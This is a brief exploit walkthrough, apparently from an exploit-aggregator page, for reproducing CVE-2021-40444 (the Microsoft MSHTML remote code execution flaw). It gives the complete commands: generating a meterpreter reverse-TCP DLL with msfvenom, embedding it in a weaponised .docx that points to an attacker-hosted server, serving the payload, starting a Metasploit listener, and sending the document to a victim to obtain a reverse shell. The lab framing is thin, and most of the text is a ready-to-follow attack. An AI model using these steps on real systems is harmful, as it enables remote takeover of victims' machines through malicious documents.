## https://sploitus.com/exploit?id=8B907536-B213-590D-81B9-32CF4A55322E
# CVE-2021-40444-POC
An attempt to reproduce Microsoft MSHTML Remote Code Execution (RCE) Vulnerability using Metasploit Framework.
*works best if not run in FlareVM*
### PREPARATION
Git Clone the repository from https://github.com/lockedbyte/CVE-2021-40444
Prepare the `.dll` template to be used later with `msfvenom`
`msfvenom -p windows/meterpreter/reverse_tcp lhost=<SOURCE_IP> lport=<LISTENING_PORT> -f dll -o template.dll`
Copy the recently produced `template.dll` into the folder `test/` from the repository
Give executable permission to the `template.dll` by `chmod +x template.dll`
Run the script to use the `template.dll` to be process into `output`
`python3 exploit.py generate ~/test/template.dll http://<SOURCE IP>`
### LISTENER
The document will then be exported into the folder `out/` and we can make a listener in our HTTP Port (Default is 80)
`python3 exploit.py host 80`
Run metasploit with
`msfconsole -q`
`use multi/handler`
`set payload windows/meterpreter/reverse_tcp`
`set lhost <SOURCE IP>`
`run`
### PAYLOAD
Then we can send the `document.docx` to our vulnerable machine and execute the .docx
We will get response in the `exploit.py` terminal and also the lab is successful if we are able to spawn reverse tcp shell.